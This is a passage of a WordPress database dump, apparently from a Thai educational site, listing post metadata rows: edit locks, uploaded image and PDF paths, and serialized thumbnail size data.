tter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25739, 10428, '_thumbnail_id', '10429'),
(25742, 10428, '_hide_featured', NULL),
(25747, 10431, '_edit_lock', '1597291815:14'),
(25748, 10431, '_edit_last', '14'),
(25749, 10431, '_oembed_0be655da7f4d2f2acf912a2b53dacda0', '{{unknown}}'),
(25750, 10432, '_wp_attached_file', '2020/08/13086336.jpg'),
(25751, 10432, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086336.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086336-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086336-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086336-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25752, 10431, '_thumbnail_id', '10432'),
(25755, 10431, '_hide_featured', NULL),
(25758, 10434, '_edit_lock', '1597292037:14'),
(25759, 10434, '_oembed_0be655da7f4d2f2acf912a2b53dacda0', '{{unknown}}'),
(25760, 10434, '_edit_last', '14'),
(25761, 10435, '_wp_attached_file', '2020/08/13086337.jpg'),
(25762, 10435, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/13086337.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086337-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086337-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086337-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25763, 10434, '_thumbnail_id', '10435'),
(25766, 10434, '_hide_featured', NULL),
(25769, 10437, '_wp_attached_file', '2019/12/379237.jpg'),
(25770, 10437, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:720;s:4:\"file\";s:18:\"2019/12/379237.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:18:\"379237-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:18:\"379237-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:18:\"379237-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:19:\"379237-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:18:\"379237-400x225.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25771, 10438, '_wp_attached_file', '2019/12/00011.jpg'),
(25772, 10438, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2481;s:4:\"file\";s:17:\"2019/12/00011.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:17:\"00011-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:17:\"00011-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:17:\"00011-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:18:\"00011-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:17:\"00011-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25773, 10440, '_wp_attached_file', '2019/12/13086319.jpg'),
(25774, 10440, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2019/12/13086319.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"13086319-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"13086319-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"13086319-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"13086319-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25775, 10442, '_edit_lock', '1597393270:14'),
(25776, 10442, '_edit_last', '14'),
(25777, 10443, '_wp_attached_file', '2020/08/ประกาศรับครูจ้าง-วิทยาศาสตร์.pdf'),
(25780, 10442, '_hide_featured', NULL),
(25783, 10445, '_edit_lock', '1597719454:14'),
(25784, 10445, '_edit_last', '14'),
(25785, 10446, '_wp_attached_file', '2020/08/08-14-2020-15.15.44.pdf'),
(25788, 10445, '_hide_featured', NULL),
(25791, 10450, '_edit_lock', '1597719784:14'),
(25792, 10450, '_edit_last', '14'),
(25793, 10451, '_wp_attached_file', '2020/08/20200817181122027.pdf'),
(25796, 10450, '_hide_featured', NULL),
(25803, 10454, '_edit_lock', '1597748571:14'),
(25804, 10454, '_edit_last', '14'),
(25805, 10455, '_wp_attached_file', '2020/08/ประกาศรายชื่อผู้มีสิทธิ์สอบเจ้าหน้าที่ท.pdf'),
(25808, 10454, '_hide_featured', NULL),
(25811, 10457, '_wp_attached_file', '2020/08/บริหาร.jpg'),
(25812, 10457, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:30:\"2020/08/บริหาร.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"บริหาร-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"บริหาร-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"บริหาร-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:31:\"บริหาร-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:30:\"บริหาร-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25813, 10458, '_wp_attached_file', '2020/08/บริหาร-1.jpg'),
(25814, 10458, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:3508;s:6:\"height\";i:2480;s:4:\"file\";s:32:\"2020/08/บริหาร-1.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"บริหาร-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"บริหาร-1-300x212.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:212;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"บริหาร-1-768x543.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:543;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:33:\"บริหาร-1-1024x724.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:724;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:32:\"บริหาร-1-400x283.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:283;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25815, 10460, '_wp_attached_file', '2018/10/Untitled-1.jpg'),
(25816, 10460, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:450;s:6:\"height\";i:600;s:4:\"file\";s:22:\"2018/10/Untitled-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"Untitled-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"Untitled-1-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25821, 10462, '_edit_lock', '1597888109:14'),
(25822, 10462, '_edit_last', '14'),
(25823, 10463, '_wp_attached_file', '2020/08/08-20-2020-08.35.34.pdf'),
(25826, 10462, '_hide_featured', NULL),
(25829, 10465, '_wp_attached_file', '2018/01/รูป-ดร.ภูมิพัฒน์-ปกติขาว.jpg'),
(25830, 10465, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:444;s:6:\"height\";i:603;s:4:\"file\";s:78:\"2018/01/รูป-ดร.ภูมิพัฒน์-ปกติขาว.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:78:\"รูป-ดร.ภูมิพัฒน์-ปกติขาว-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:78:\"รูป-ดร.ภูมิพัฒน์-ปกติขาว-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:78:\"รูป-ดร.ภูมิพัฒน์-ปกติขาว-221x300.jpg\";s:5:\"width\";i:221;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25835, 10467, '_edit_lock', '1598324197:14'),
(25836, 10468, '_wp_attached_file', '2020/08/25086303.jpg'),
(25837, 10468, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/25086303.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25086303-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25086303-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"25086303-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25086303-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25086303-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25838, 10469, '_wp_attached_file', '2020/08/25086301.jpg'),
(25839, 10469, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:824;s:4:\"file\";s:20:\"2020/08/25086301.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25086301-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25086301-300x193.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:193;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:20:\"25086301-768x494.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:494;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:21:\"25086301-1024x659.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:659;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25086301-400x258.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25840, 10470, '_wp_attached_file', '2020/08/25086302.jpg'),
(25841, 10470, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/25086302.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25086302-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25086302-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25086302-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25842, 10467, '_edit_last', '14'),
(25843, 10467, '_thumbnail_id', '10469'),
(25846, 10467, '_hide_featured', NULL),
(25849, 10472, '_edit_lock', '1598324261:14'),
(25850, 10472, '_edit_last', '14'),
(25851, 10472, '_thumbnail_id', '10470'),
(25854, 10472, '_hide_featured', NULL),
(25857, 10474, '_edit_lock', '1598324349:14'),
(25858, 10474, '_edit_last', '14'),
(25859, 10474, '_thumbnail_id', '10468'),
(25862, 10474, '_hide_featured', NULL),
(25865, 10476, '_edit_lock', '1598324923:14'),
(25866, 10476, '_edit_last', '14'),
(25867, 10477, '_wp_attached_file', '2020/08/25086304.jpg'),
(25868, 10477, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:20:\"2020/08/25086304.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"25086304-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"25086304-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:20:\"25086304-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25869, 10478, '_wp_attached_file', '2020/08/25086303-1.jpg'),
(25870, 10478, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:22:\"2020/08/25086303-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25086303-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25086303-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25086303-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25871, 10479, '_wp_attached_file', '2020/08/25086302-1.jpg'),
(25872, 10479, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:22:\"2020/08/25086302-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25086302-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25086302-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25086302-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25873, 10480, '_wp_attached_file', '2020/08/25086301-1.jpg'),
(25874, 10480, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:679;s:6:\"height\";i:960;s:4:\"file\";s:22:\"2020/08/25086301-1.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"25086301-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"25086301-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:22:\"25086301-1-212x300.jpg\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25877, 10476, '_hide_featured', NULL),
(25878, 10482, '_wp_attached_file', '2019/12/Untitled-2.png'),
(25879, 10482, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:280;s:4:\"file\";s:22:\"2019/12/Untitled-2.png\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"Untitled-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"Untitled-2-300x66.png\";s:5:\"width\";i:300;s:6:\"height\";i:66;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"Untitled-2-768x168.png\";s:5:\"width\";i:768;s:6:\"height\";i:168;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"Untitled-2-1024x224.png\";s:5:\"width\";i:1024;s:6:\"height\";i:224;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:21:\"Untitled-2-400x88.png\";s:5:\"width\";i:400;s:6:\"height\";i:88;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(25880, 10485, '_wp_attached_file', '2019/12/Untitled-2-1.png'),
